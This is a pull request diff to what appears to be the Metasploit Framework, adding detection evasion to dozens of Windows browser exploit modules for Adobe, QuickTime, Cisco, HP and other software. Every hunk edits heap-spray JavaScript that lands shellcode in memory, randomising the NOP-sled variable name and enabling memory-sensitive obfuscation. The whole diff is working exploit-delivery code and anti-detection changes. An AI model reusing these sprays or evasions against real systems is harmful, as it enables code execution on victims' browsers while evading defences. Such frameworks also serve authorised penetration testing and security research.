### PR TITLE
Evasions for delivering nops/shellcode into memory

### DIFF
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -210,11 +210,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_pivot = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -140,11 +140,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -168,11 +170,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def get_aligned_spray(t, js_rop, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var rop_chain = unescape("#{js_rop}");
 
     while (nops.length < 0x80000) nops += nops;

--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -372,7 +372,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -116,11 +116,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']

--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #Javascript obfuscation is optional
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"

--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -210,6 +210,9 @@ class MetasploitModule < Msf::Exploit::Remote
       js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
     end
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     js = <<-JS
     function heap_spray(heaplib, nops, code, offset, max) {
       while (nops.length < 0x2000) nops += nops;
@@ -224,7 +227,8 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var code = unescape("#{shellcode}");
     heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
     var fake_pointers = unescape("#{pivot}");

--- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
+++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
@@ -88,6 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Make some nops
     nops    = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Randomize variables
     rand1  = rand_text_alpha(rand(100) + 1)
@@ -95,7 +96,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     script = %Q|
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 while (#{rand2}.length < #{target['Size']}) #{rand2} += #{rand2};
 #{rand2} = #{rand2}.substring(0, #{target['Size']} - #{rand1}.length);
 memory = new Array();

--- a/modules/exploits/windows/browser/adobe_geticon.rb
+++ b/modules/exploits/windows/browser/adobe_geticon.rb
@@ -92,13 +92,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
     rand12 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{randnop}");
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape(#{randnop});
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

--- a/modules/exploits/windows/browser/adobe_jbig2decode.rb
+++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb
@@ -86,16 +86,18 @@ class MetasploitModule < Msf::Exploit::Remote
     rand14	= rand_text_alpha(rand(50) + 1)
     rand15	= rand_text_alpha(rand(50) + 1)
     rand16	= rand_text_alpha(rand(50) + 1)
+    randnop     = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = "";
     var #{rand2} = "";
     var #{rand3} = unescape("#{shellcode}");
     var #{rand4} = "";
+    var #{randnop} = "#{nops}";
 
-    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape("#{nops}");
+    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape(#{randnop});
     #{rand6} = #{rand4} + #{rand3};
-    #{rand7} = unescape("#{nops}");
+    #{rand7} = unescape(#{randnop});
     #{rand8} = 20;
     #{rand9} = #{rand8}+#{rand6}.length
     while (#{rand7}.length<#{rand9}) #{rand7}+=#{rand7};

--- a/modules/exploits/windows/browser/adobe_media_newplayer.rb
+++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb
@@ -107,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand3  = rand_text_alpha(rand(100) + 1)
     rand4  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
     rand5  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
+    randnop = rand_text_alpha(rand(100) + 1)
 
     vtbuf = [target.ret].pack('V') * 4
     vtbuf << rand_text_alpha(len - vtbuf.length)
@@ -115,8 +116,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # The printd strings are 72 bytes (??)
     script = %Q|
+var #{randnop} = "#{nops}";
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = unescape("#{retstring}");
 while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
 #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);

--- a/modules/exploits/windows/browser/adobe_utilprintf.rb
+++ b/modules/exploits/windows/browser/adobe_utilprintf.rb
@@ -73,13 +73,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand9  = rand_text_alpha(rand(100) + 1)
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
+    var #{randnop} = "#{nops}";
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(#{randnop});
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape("#{randnop}");
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -117,13 +117,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{get_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -139,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb
+++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
@@ -85,6 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_eax        = rand_text_alpha(rand(100) + 1)
     j_bof        = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|
@@ -92,7 +93,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='#{ampx}'></OBJECT>
 <script language='javascript'>
   #{j_shellcode}=unescape('#{shellcode}');
-  #{j_nops}=unescape('#{nops}');
+  var #{randnop} = "#{nops}";
+  #{j_nops}=unescape(#{randnop});
   #{j_headersize}=20;
   #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
   while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};

--- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb
@@ -184,7 +184,7 @@ heapSpray(myoffset,myshellcode,myfillsled);
 
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
       end
 
       content =  "<html>"

--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -218,7 +218,7 @@ for (var i=0; i < 1600; i++) {
         #obfuscate on demand
         if datastore['OBFUSCATE']
           js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-          js_spray.obfuscate
+          js_spray.obfuscate(memory_sensitive: true)
         end
       else
         js_spray = <<-JS

--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -191,13 +191,15 @@ class MetasploitModule < Msf::Exploit::Remote
       arch = Rex::Arch.endian(my_target.arch)
       nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
       code = Rex::Text.to_unescape(payload.encoded, arch)
+      randnop = rand_text_alpha(rand(100) + 1)
 
       # Spray puts payload on 0x31313131
       if my_target.name =~ /IE/
         spray = <<-JS
 var heap_obj = new heapLib.ie(0x20000);
 var code = unescape("#{code}");
-var nops = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var nops = unescape(#{randnop});
 
 while (nops.length < 0x80000) nops += nops;
 var offset = nops.substring(0, 0x800 - code.length);
@@ -223,7 +225,8 @@ for (var i=0; i < 1600; i++) {
       else
         js_spray = <<-JS
 var shellcode = unescape("#{code}");
-var bigblock = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var bigblock = unescape(#{randnop});
 var headersize = 20;
 var slackspace = headersize + shellcode.length;
 while (bigblock.length < slackspace) bigblock += bigblock;

--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -83,11 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     nops = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-EOS

--- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb
+++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|
       <html>
       <body>

--- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
+++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
@@ -100,7 +100,7 @@ vulnerable.OnBeforeVideoDownload(evil_string);
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 
     # Generate the final HTML
     content = %Q|<html>

--- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
+++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
@@ -118,7 +118,7 @@ window.location = "#{hcp_url}";
       }
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
 =end
     js = encrypt_js(js, @javascript_encode_key)
 

--- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
+++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
     x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
     x.url = "#{url}/#{dir}/";
 |
-    js.obfuscate
+    js.obfuscate(memory_sensitive: true)
     html = "<html>\n\t<script>#{js}\t</script>\n</html>"
     print_status("Sending #{self.name}")
     send_response_html(cli, html)

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -224,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if datastore['OBFUSCATE']
         js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
+        js.obfuscate(memory_sensitive: true)
       end
     end
 

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -104,11 +104,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -398,7 +398,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     sploit = "http://"

--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -149,11 +149,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -175,12 +177,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var nops_90 = unescape("#{js_90_nops}");
     var rop_chain = unescape("#{js_rop}");
 

--- a/modules/exploits/windows/browser/citrix_gateway_actx.rb
+++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb
@@ -131,12 +131,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # payload in JS format
     code = Rex::Text.to_unescape(payload.encoded)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     #For debugging purposes: nops.substring(0,0x534) lands the payload exactly at 0x0c0c0c0c for IE6
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops += nops;
     var offset = nops.substring(0, 0x550);

--- a/modules/exploits/windows/browser/citrix_gateway_actx.rb
+++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     spray = heaplib(spray, {:noobfu => true})
     spray = ::Rex::Exploitation::JSObfu.new(spray)
-    spray.obfuscate
+    spray.obfuscate(memory_sensitive: true)
 
     load = %Q|
     var d=document.getElementById("nsepadiv");

--- a/modules/exploits/windows/browser/creative_software_cachefolder.rb
+++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb
@@ -70,12 +70,16 @@ class MetasploitModule < Msf::Exploit::Remote
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     content = %Q|
       <html>
         <object id='#{vname}' classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715'></object>
         <script language="JavaScript">
         var #{rand1} = unescape('#{shellcode}');
-        var #{rand2} = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var #{rand2} = unescape(#{randnop});
         var #{rand3} = 20;
         var #{rand4} = #{rand3} + #{rand1}.length;
         while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -161,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -139,13 +139,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 6, 7, 8
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
+++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
@@ -85,11 +85,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

--- a/modules/exploits/windows/browser/ea_checkrequirements.rb
+++ b/modules/exploits/windows/browser/ea_checkrequirements.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--

--- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
+++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
@@ -60,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
     shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
     nops    = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     ret     = Rex::Text.uri_encode([target.ret].pack('L'))
 
@@ -78,7 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <object classid='clsid:BA83FD38-CE14-4DA3-BEF5-96050D55F78A' id='#{vname}'></object>
 <script language='javascript'>
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/honeywell_tema_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb
@@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     html = <<-EOS

--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -104,6 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -133,7 +134,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -152,7 +154,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
@@ -113,6 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -142,7 +143,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -161,7 +163,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/hpmqc_progcolor.rb
+++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb
@@ -82,13 +82,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:98C53984-8BF8-4D11-9B1C-C324FCA9CADE' id='#{mqcontrol}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};

